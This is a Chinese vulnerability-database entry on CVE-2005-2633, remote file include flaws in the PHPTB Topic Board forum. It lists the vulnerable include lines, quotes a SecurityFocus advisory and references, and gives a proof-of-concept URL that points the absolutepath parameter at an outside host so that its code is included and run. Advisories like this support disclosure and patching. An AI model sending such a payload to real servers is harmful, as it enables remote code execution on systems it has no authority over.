PHPTB Topic Board PHP文件包含漏洞

PHPTB Topic Board PHP文件包含漏洞

漏洞ID 1109000 漏洞类型 输入验证
发布时间 2005-08-17 更新时间 2005-10-20
图片[1]-PHPTB Topic Board PHP文件包含漏洞-安全小百科CVE编号 CVE-2005-2633
图片[2]-PHPTB Topic Board PHP文件包含漏洞-安全小百科CNNVD-ID CNNVD-200508-246
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26166
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-246
|漏洞详情
PHPTBTopicBoard是一款开放源码的论坛程序。PHPTB中存在多个远程文件包含漏洞,可能允许恶意的攻击者在webserver上远程执行代码。有漏洞的代码存在于./classes/board_o.php、./classes/dev_o.php、./classes/file_o.php和./classes/tech_o.php中:include$absolutepath.’classes/smart_o.php’;…EOF此外./classes/dev_o.php和./classes/tech_o.php中的漏洞代码:…require$GLOBALS[‘absolutepath’].’userpass.php’;…EOF
|漏洞EXP
source: http://www.securityfocus.com/bid/14592/info
    
PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
    
An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/classes/tech_o.php?absolutepath=http://www.example.com/
|参考资料

来源:BID
名称:14592
链接:http://www.securityfocus.com/bid/14592
来源:BUGTRAQ
名称:20050817PHPTBTopicBoard<=20:MultiplePHPinjectionvulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112431407619802&w;=2
来源:SECUNIA
名称:16492
链接:http://secunia.com/advisories/16492

相关推荐: Magic WinMail Server拒绝服务漏洞

Magic WinMail Server拒绝服务漏洞 漏洞ID 1107375 漏洞类型 格式化字符串 发布时间 2003-06-11 更新时间 2003-07-02 CVE编号 CVE-2003-0391 CNNVD-ID CNNVD-200307-005 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享